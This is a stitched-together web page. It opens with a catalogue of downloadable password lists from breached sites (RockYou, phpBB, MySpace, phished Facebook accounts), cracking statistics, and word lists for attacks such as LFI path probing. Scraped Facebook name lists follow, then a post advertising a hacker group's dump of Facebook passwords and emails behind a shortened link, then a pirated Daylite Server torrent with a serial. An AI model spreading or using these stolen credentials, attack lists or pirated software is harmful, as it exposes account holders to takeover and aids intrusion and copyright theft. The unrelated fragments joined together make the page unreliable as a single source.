Name Compressed Uncompressed Date Notes
Rockyou rockyou.txt.bz2 (60,498,886 bytes) n/a 2009-12 Best list available; huge, stolen unencrypted
Rockyou with count rockyou-withcount.txt.bz2 (59,500,255 bytes) n/a
phpbb phpbb.txt.bz2 (868,606 bytes) n/a 2009-01 Ordered by commonness
Cracked from md5 by Brandon Enright
(97%+ coverage)
phpbb with count phpbb-withcount.txt.bz2 (872,867 bytes) n/a
phpbb with md5 phpbb-withmd5.txt.bz2 (4,117,887 bytes) n/a
MySpace myspace.txt.bz2 (175,970 bytes) n/a 2006-10 Captured via phishing
MySpace - with count myspace-withcount.txt.bz2 (179,929 bytes) n/a
Hotmail hotmail.txt.bz2 (47,195 bytes) n/a Unknown Isn't clearly understood how these were stolen
Hotmail with count hotmail-withcount.txt.bz2 (47,975 bytes) n/a
Faithwriters faithwriters.txt.bz2 (39,327 bytes) n/a 2009-03 Religious passwords
Faithwriters - with count faithwriters-withcount.txt.bz2 (40,233 bytes) n/a
Elitehacker elitehacker.txt.bz2 (3,690 bytes) n/a 2009-07 Part of zf05.txt
Elitehacker - with count elitehacker-withcount.txt.bz2 (3,846 bytes) n/a
Hak5 hak5.txt.bz2 (16,490 bytes) n/a 2009-07 Part of zf05.txt
Hak5 - with count hak5-withcount.txt.bz2 (16,947 bytes) n/a
Älypää alypaa.txt.bz2 (5,178 bytes) n/a 2010-03 Finnish passwords
alypaa - with count alypaa-withcount.txt.bz2 (6,013 bytes) n/a
Facebook (Pastebay) facebook-pastebay.txt.bz2 (375 bytes) n/a 2010-04 Found on Pastebay;
appear to be malware-stolen.
Facebook (Pastebay) - w/ count facebook-pastebay-withcount.txt.bz2 (407 bytes) n/a
Unknown porn site porn-unknown.txt.bz2 (30,600 bytes) n/a 2010-08 Found on angelfire.com. No clue where they originated, but clearly porn site.
Unknown porn site - w/ count porn-unknown-withcount.txt.bz2 (31,899 bytes) n/a
Ultimate Strip Club List tuscl.txt.bz2 (176,291 bytes) n/a 2010-09 Thanks to Mark Baggett for finding!
Ultimate Strip Club List - w/ count tuscl-withcount.txt.bz2 (182,441 bytes) n/a
[Facebook Phished] facebook-phished.txt.bz2 (14,457 bytes) n/a 2010-09 Thanks to Andrew Orr for reporting
Facebook Phished - w/ count facebook-phished-withcount.txt.bz2 (14,941 bytes) n/a
Carders.cc carders.cc.txt.bz2 (8,936 bytes) n/a 2010-05
Carders.cc - w/ count carders.cc-withcount.txt.bz2 (9,774 bytes) n/a
Singles.org singles.org.txt.bz2 (50,697 bytes) n/a 2010-10
Singles.org - w/ count singles.org-withcount.txt.bz2 (52,884 bytes) n/a
Unnamed financial site (reserved) (reserved) 2010-12
Unnamed financial site - w/ count (reserved) (reserved)
Gawker (reserved) (reserved) 2010-12
Gawker - w/ count (reserved) (reserved)
Free-Hack.com (reserved) (reserved) 2010-12
Free-Hack.com w/count (reserved) (reserved)
Carders.cc (second time hacked) (reserved) (reserved) 2010-12
Carders.cc w/count (second time hacked) (reserved) (reserved)

Statistics

I did some tests of my various dictionaries against the different sets of leaked passwords. I grouped them by the password set they were trying to crack:
[Charts: cracked_500worst.png, cracked_elitehackers.png, cracked_faithwriters.png, cracked_hak5.png, cracked_hotmail.png, cracked_myspace.png, cracked_phpbb.png, cracked_rockyou.png]
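The "coverage" figure behind tests like these (e.g. the "97%+ coverage" noted for phpbb above) boils down to one ratio: what fraction of a leaked password set also appears in a given dictionary. A minimal sketch, with invented sample data:

```python
def coverage(dictionary_words, leaked_passwords):
    """Fraction of leaked passwords that appear in the dictionary.
    Duplicate leaked passwords count once each, as in a raw dump."""
    dict_set = set(dictionary_words)
    hits = sum(1 for p in leaked_passwords if p in dict_set)
    return hits / len(leaked_passwords)

# Invented example: 3 of the 4 leaked entries are in the dictionary.
print(coverage(["password", "123456", "letmein"],
               ["123456", "qwerty", "password", "password"]))  # 0.75
```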
Miscellaneous non-hacking dictionaries

These are dictionaries of words (etc), not passwords. They may be useful for one reason or another.
Name Compressed Uncompressed Notes
English english.txt.bz2 (1,368,101 bytes) n/a My combination of a couple lists, from Andrew Orr, Brandon Enright, and Seth
German german.txt.bz2 (2,371,487 bytes) n/a Compiled by Brandon Enright
American cities us_cities.txt.bz2 (77,081 bytes) n/a Generated by RSnake
"Porno" porno.txt.bz2 (7,158,285 bytes) n/a World's largest porno password collection!
Created by Matt Weir
Honeynet honeynet.txt.bz2 (889,525 bytes) n/a From a honeynet run by Joshua Gimer
Honeynet - w/ count honeynet-withcount.txt.bz2 (901,868 bytes) n/a
File locations file-locations.txt.bz2 (1,724 bytes) n/a Potential logfile locations (for LFI, etc).
Thanks to Seth!
Fuzzing strings (Python) fuzzing-strings.txt.bz2 (276 bytes) n/a Thanks to Seth!
PHPMyAdmin locations phpmyadmin-locations.txt.bz2 (304 bytes) n/a Potential PHPMyAdmin locations.
Thanks to Seth!
Web extensions web-extensions.txt.bz2 (117 bytes) n/a Common extensions for Web files.
Thanks to dirb!
Web mutations web-mutations.txt.bz2 (177 bytes) n/a Common 'mutations' for Web files.
Thanks to dirb!


DirBuster has some awesome lists, too -- usernames and filenames.
Facebook lists

These are the lists I generated from this data. Some are more useful than others as password lists. All lists are sorted by commonness.

If you want a bunch of these, I highly recommend using the torrent. It's faster, and you'll get them all at once.
Name Compressed Uncompressed Date Notes
Full names facebook-names-unique.txt.bz2 (479,332,623 bytes) n/a 2010-08
Full names - w/ count facebook-names-withcount.txt.bz2 (477,274,173 bytes) n/a
First names facebook-firstnames.txt.bz2 (16,464,124 bytes) n/a 2010-08
First names - w/ count facebook-firstnames-withcount.txt.bz2 (73,134,218 bytes) n/a
Last names facebook-lastnames.txt.bz2 (21,176,444 bytes) n/a 2010-08
Last names - w/ count facebook-lastnames-withcount.txt.bz2 (21,166,232 bytes) n/a
First initial last names facebook-f.last.txt.bz2 (67,110,776 bytes) n/a 2010-08
First initial last names - w/ count facebook-f.last-withcount.txt.bz2 (66,348,431 bytes) n/a
First name last initial facebook-first.l.txt.bz2 (37,463,798 bytes) n/a 2010-08
First name last initial - w/ count facebook-first.l-withcount.txt.bz2 (36,932,295 bytes) n/a
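The "first initial + last name" and "first name + last initial" patterns in the lists above can be derived from full names with a few lines of code (a sketch; the sample names are invented):

```python
def username_patterns(full_name):
    """Derive f.last and first.l username candidates from a full name."""
    parts = full_name.lower().split()
    if len(parts) < 2:
        return []  # single-word names yield no pattern
    first, last = parts[0], parts[-1]
    return [first[0] + "." + last,   # first initial + last name
            first + "." + last[0]]   # first name + last initial

# Example with an invented name:
print(username_patterns("Jane Doe"))  # ['j.doe', 'jane.d']
```

Middle names are skipped (only the first and last tokens are used), which matches how the lists above collapse full names into two-part candidates.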



10 October 2016

"OpIsrael Of Gaza Hacker Team # In Password FaceBook And Email" .txt



Click the link below!

The .txt files are not hosted on the blog!
5 seconds...


http://linkshrink.net/7crDaX

Daylite Server 6.0.6


Improve the productivity and efficiency of a business with Daylite.

Technology can help us manage our business effectively. In fact, there is a huge amount of software that helps us organize, review and keep track of inventory, schedule meetings, and much more. For those who do not want a separate service for each of their needs, and who use a Mac, a good alternative is Daylite, a program that has been around for a long time and is one of the best business applications for OS X. Daylite has always known how to adapt to the times, and now we will see how it can help us improve our business.

Daylite is one of the business applications developed by Marketcircle, and it gives us many options out of the box. It is ideal for small businesses that suddenly find themselves growing and need a tool that accompanies that growth by integrating multiple services into one application. Within a single window we can find everything we need: email, a schedule, a task list, goal reviews, reports, teams and more.

Name: Daylite Server
Version: 6.0.6
Language: English
Includes: Serial

OS version: 10.10 or later
More information: https://www.marketcircle.com/daylite/

Free torrent download of Daylite Server 6.0.6 for Mac OS X